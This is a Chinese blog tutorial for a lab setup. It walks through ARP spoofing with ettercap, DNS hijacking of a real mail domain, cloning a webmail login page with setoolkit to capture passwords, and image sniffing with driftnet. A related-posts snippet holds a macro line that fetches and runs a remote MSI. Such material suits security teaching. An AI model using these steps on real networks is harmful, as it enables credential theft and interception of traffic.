内网渗透之 arp欺骗-dns劫持-网站钓鱼

已于 2022-02-26 12:32:08 修改
阅读量5.2k 收藏 20
点赞数 2
分类专栏: 内网渗透 文章标签: 安全 渗透测试
于 2022-02-26 11:22:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65244586/article/details/123147142
版权

环境信息

攻击机kali 192.168.10.124

靶机win7 192.168.10.229

arp欺骗

用到ettercap工具

1、启动ettercap -G

image-20220210165852584

2、设置嗅探网卡,如eth0

扫描存活主机

image-20220210170153443

将靶机192.168.10.229添加为目标1,网关192.168.10.1添加为目标2

image-20220210170609911

进行arp欺骗

image-20220210170533126

image-20220210170639222

此时可以在靶机win7上看到kali的mac地址和网关mac地址一致,欺骗成功

image-20220210170924426

dns劫持

1、编辑 Ettercap 的文件vim /etc/ettercap/etter.dns

添加mail.10086.cn A 192.168.10.124

image-20220210182121951

2、在前面arp欺骗的基础上,点击ettercap的插件这里

image-20220210181521296

3、双击dns_spoof,前面有*号,代表开始dns劫持

image-20220210181706396

4、此时再次ping mail.10086.cn,发现已经解析到kali主机(10.205是我换了另一台kali)

image-20220210191134390

image-20220210192121332

正常ettercap这里应该能看到用户登录信息,但是可能是环境问题,几次都没有复现成功。

网站钓鱼

kali输入setoolkit启动setoolkit

依次选择

image-20220210171901313

image-20220210171920217

image-20220210171946492

image-20220210172009172

输入kali IP 192.168.10.124

image-20220210172052156

输入要克隆的网站,一般是后台登录路径url,实战中https的抓到的是密文

image-20220210172226789

kali本地访问kali地址192.168.10.124,弹出139邮箱的克隆页面,证明克隆成功,这里随便输入用户名密码,点击登录

image-20220210172351706

可以看到用户名密码

image-20220210172520821

正常这里需要配合上面的dns劫持,受害者去访问域名,或许用户名密码,因为受害者不会直接访问黑客IP的

截获图片

通过driftnet可以截获内网里的图片

输入driftnet -i eth0 -a -d /root/ 可以将抓取到的目标访问图片保存到kali的root目录下

前提是前面已做了arp欺骗,我在实际测试中,发现只能截获http请求的图片,https的不行

且记得做转发

echo 1 > /proc/sys/net/ipv4/ip_forward  #配置转发(如果不设置转发,靶机会出现不能上网的情况)

cat /proc/sys/net/ipv4/ip_forward	#验证如果返回是1,说明转发成功

参考 https://www.bilibili.com/video/BV1rU4y1u75f

明明如月001
关注
  • 2
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透DNS欺骗横向传播后门及控制
qq_28617309的博客
06-25 1134
内网渗透DNS欺骗横向传播后门及控制 by : blue_chocolate 未经作者授权禁止转载 摘要 “没有绝对安全的系统”伴随着科技发展,计算机广泛应用到社会事务和生活的各个方面,用户借助网络信息的共享性改变传统事务的处理方式,提高了工作效率,在带给人们快捷、方便的同时,也让社会面临着严峻的挑战,个人私密信息泄露、截获、篡改、伪造等各类网络安全问题层出不穷,威胁着个人的信息安全和社会的秩序稳定,使得我们在享受便利的同时,还要承受风险和威胁。 计算机犯罪案件逐年递增,计算机犯罪对.
内网安全-arp欺骗dns劫持钓鱼
weixin_58782362的博客
11-05 1027
攻击机一直发送伪造的数据包,欺骗网关自己是靶机,欺骗靶机自己是网关,同时开启路由转发功能,就可以让靶机在正常上网的情况下截获网络数据包,所有数据都会经过攻击机再转发给靶机。攻击机伪造数据包后本应该传输给靶机的数据错误的传输给攻击机,使靶机得不到服务器的响应数据,甚至根本无法将数据包发送出局域网。在设置的规则中,记住选择有可能解析的域名,将三级域名解析成二级域名。arpspoof -i enth -t 目标 -r 网卡。dns劫持,在arp欺骗的基础上面进行劫持。使用ettercap kali自带。
ARP欺骗DNS劫持以及Wireshark分析_arp劫持
最新发布
2401_84558590的博客
05-16 1000
同一网段下的主机网关的ip地址相同,MAC地址也相同,本实验网关的ip地址为192.168.63.2,网关的MAC地址为00-50-56-ff-58-48,不论在XP中查看还是Kali中查看,网关的ip地址和MAC地址都相同。如果在使用ping命令时,输入的是域名而不是ip地址,在执行时会先进行DNS解析,将域名解析成对应的ip地址,然后才能进行ping测试,所以此时ping百度的域名会发出DNS请求。现网关的MAC地址(在ARP欺骗下已变更为Kali的MAC地址):00-0c-29-c8-3f-d6。
内网渗透(1)--arp欺骗攻击
azraelxuemo的博客
07-12 645
实验原理 安装依赖 apt-get install bridge-utils 配置本地无线网卡, 开启流量转发,实现连入的设备可以上网 首先关闭一些服务,防止影响 service NetworkManager stop airmon-ng check kill 插入网卡并启用 airmon-ng start wlan0 把网卡变成一个ap airbase-ng --essid “test-wifi” wlan0mon --essid就是指定之后我们wifi的名字..
内网渗透之——内网arp欺骗工具使用
wsnbbz的博客
03-30 3528
原理 arp工作原理 arp协议是地址解析协议,就是将ip地址解析为mac地址,数据链路层通过mac地址进行通信,arp协议通过广播发送request请求包和接收response响应包来正常工作,请求包是寻找网关,响应包是回复我是网关,我的mac地址是,中间没有身份验证 arp欺骗原理 主机A通过广播发送request请求包,寻找网关192.168.1.1,此时主机b(非网关的同网段机器)...
ARP-Ettercap DNS劫持
m0_51957299的博客
08-23 151
Domain Name System(DNS),我们称之为域名解析系统,默认占用53端口,它的本身实质上是一个域名和IP的数据库服务器,主要是将我们输入的域名转换成IP地址,之后通过IP地址寻址连接目标服务器。当访问一个网站时主机将从DNS缓存中读取该域名所对应的IP地址,当查找不到时就会到系统中查找hosts文件,如果还没有找到那么就会向DNS服务器发送一个DNS查询请求,DNS服务器响应对应的IP地址给主机,主机收到后会使用该IP地址进行访问并将其保存到DNS缓存中。
基于ARP欺骗内网渗透和防范.pdf
01-25
### 基于ARP欺骗内网渗透和防范 #### ARP欺骗概述 ARP欺骗是一种网络攻击方式,通过篡改网络中的ARP缓存表来实现非法访问或数据窃取的目的。ARP(Address Resolution Protocol,地址解析协议)是用于将IP地址转换...
内网渗透之端口转发-内网代理1
08-03
①正向代理 (Forward Proxy) ②反向代理(reverse proxy) ③区分 ①内网机器上执行:lcx.exe –slave 公网 IP + 端
内网渗透知识大全1-87章全部教程
04-08
1.内网渗透(一)之基础知识-内网渗透介绍和概述 2.内网渗透(二)之基础知识-工作组介绍 3.内网渗透(三)之基础知识-域环境的介绍和优点 4.内网渗透(四)之基础知识-搭建域环境 5.内网渗透(五)之基础知识-Active ...
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
内网渗透综合实验 - 实验指导书
10-23
内网渗透综合实验 - 实验指导书,通过实验学习内网渗透的细节,掌握内网攻防的具体步骤,可以进行实战操作
中级DNS劫持,做钓鱼网站
haha1314的博客
05-14 786
环境: 配置一个目标网站www.wf.com 设置dns解析www.wf.com 网卡:192.168.88.2 Win7 被欺骗的 ip:192.168.88.143 Win server 2008 DNS服务器 ip:192.168.88.136 选择自己所在的网卡 代码如下: from scapy.all import * dnss="192.168.88.136" xwl...
网络安全DNS欺骗与钓鱼网站
IT之一小佬的博客
06-30 528
网络安全DNS欺骗与钓鱼网站
ARP欺骗DNS劫持以及Wireshark分析
m0_59302403的博客
04-02 4352
利用ettercap进行中间人攻击之ARP欺骗DNS劫持,用Wireshark分析相关特征数据,提高对ettercap、Wireshark的熟练度,同时也对中间人攻击有更加深入的认识。
ARP攻击与DNS劫持,使被攻击者进入钓鱼网站
weixin_45116657的博客
06-13 2613
实验环境 钓鱼网站: 虚拟机Windows 2008搭建的网站, 攻击者: 物理机win10, 被攻击者: 虚拟机win7, 实验目的 通过DNS劫持,将被攻击者的域名请求解析为错误的IP地址(即,钓鱼网站的IP地址),并返回给被攻击者,使得被攻击者进入钓鱼网站,达到实验目的。 DNS劫持 DNS劫持又称域名,是指在劫持网站范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求...
网络安全之内外网渗透-网络钓鱼技巧
weixin_46626737的博客
06-30 218
操作:先使用msf生成一个msi文件,放到云服务器上,然后新建一个excle表,右键点击插入宏表,然后第一格输入=EXEC(“msiexec /q /i http://192.168.10.88/123.msi”),第二格输入=HALT()入cs生成的代码,选择auto open选项,然后保存,弹出的框选择否,然后会出现另存为,选择dotm启用宏的文件,在通过邮件发。利用生成的宏代码,放到word中,记得word一定要开启开发者模式,在开发者模式中选择宏,取名,编辑,在编辑弹出的框中加。
渗透测试-----ARP欺骗
qq_61947585的博客
11-05 590
arp欺骗,断网攻击 渗透实验复现
ARP欺骗+DNS欺骗
热门推荐
嘻嘻哈哈
01-24 1万+
一、共享网络与交换网络的区别 1、共享网络 在共享网络中,由于HUB属于一层设备,对于到达本身的数据报文,HUB会对报文进行广播(除了收到报文的那个接口),因此接在同HUB的所有PC都能收到该报文。前提PC开启了混杂模式 注: 通常情况下,网卡都是工作在非混杂模式,也就是说即使收到数据报文,网卡会判断目的MAC是否和自己的一样,不一样的话代表数据包不是给自己的,因此会丢弃,只
内网劫持DNS之 Ettercap
新火燎塬的博客
11-23 331
内网劫持DNS之 Ettercap
内网渗透--DNS隧道
05-16
DNS隧道是一种基于DNS协议的网络隧道,可以用于在内网环境中进行数据传输。DNS协议本身是一种无状态的协议,可以通过DNS请求和响应消息中的域名字段来传输数据。 在DNS隧道中,攻击者利用内网中一台主机上的DNS客户端程序向外部DNS服务器发送DNS请求。DNS请求消息中包含着攻击者需要传输的数据,这些数据经过编码后放入DNS请求中的域名字段中。外部DNS服务器接收到DNS请求消息后,解析出其中的数据,再将数据封装成DNS响应消息返回给内网主机。内网主机收到DNS响应消息后,解析出其中的数据,实现数据传输。 DNS隧道的优点是可以绕过内网防火墙和其他安全设备的检测,可以在内网环境中进行数据传输,而不被发现。但是,DNS隧道也存在一些缺点,例如传输速度较慢,数据传输量受限等。 为了防范DNS隧道攻击,内网环境中可以采取以下措施: 1. 禁止内网主机直接访问外部DNS服务器,只允许内网主机访问内部DNS服务器。 2. 配置内部DNS服务器,限制DNS请求和响应中的域名字段长度,防止DNS隧道传输数据。 3. 部署DNS防火墙,对DNS流量进行监控和过滤,防止DNS隧道攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值